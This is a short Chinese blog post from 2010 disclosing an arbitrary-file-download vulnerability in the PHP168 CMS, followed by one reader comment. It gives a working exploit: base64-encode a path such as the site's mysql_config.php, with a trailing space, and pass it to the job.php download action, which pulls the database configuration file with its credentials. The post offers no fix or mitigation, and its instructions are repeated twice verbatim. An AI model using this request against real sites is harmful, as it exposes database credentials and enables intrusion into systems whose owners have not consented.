上一篇
下一篇
PHP168下载任意文件漏洞(曾经的漏洞依然存在)
作者:许诺 日期:2010-06-30
测试方法:
首先,我们把需要下载的文件名改用base64_encode形式。如下:
php168/mysql_config.php
要注意,文件名后面需要多一个空格。
加密后:
cGhwMTY4L215c3FsX2NvbmZpZy5waHAg
这时提交地址:
http://localhost:8090/php168/do/job.php?job=download&url=cGhwMTY4L215c3FsX2NvbmZpZy5waHAg
(注意,网站目录是http://localhost:8090/php168/)
即可下载其文件:
首先,我们把需要下载的文件名改用base64_encode形式。如下:
php168/mysql_config.php
要注意,文件名后面需要多一个空格。
加密后:
cGhwMTY4L215c3FsX2NvbmZpZy5waHAg
这时提交地址:
http://localhost:8090/php168/do/job.php?job=download&url=cGhwMTY4L215c3FsX2NvbmZpZy5waHAg
(注意,网站目录是http://localhost:8090/php168/)
即可下载其文件:
文章来自: 
引用通告: 
Tags: 
相关日志:
评论: 1 | 引用: 0 | 查看次数: 450
回复
QQ牧场[2010-07-14 04:56 PM | 
]可怜我用的就是php168,做的。 可别出问题。
发表评论
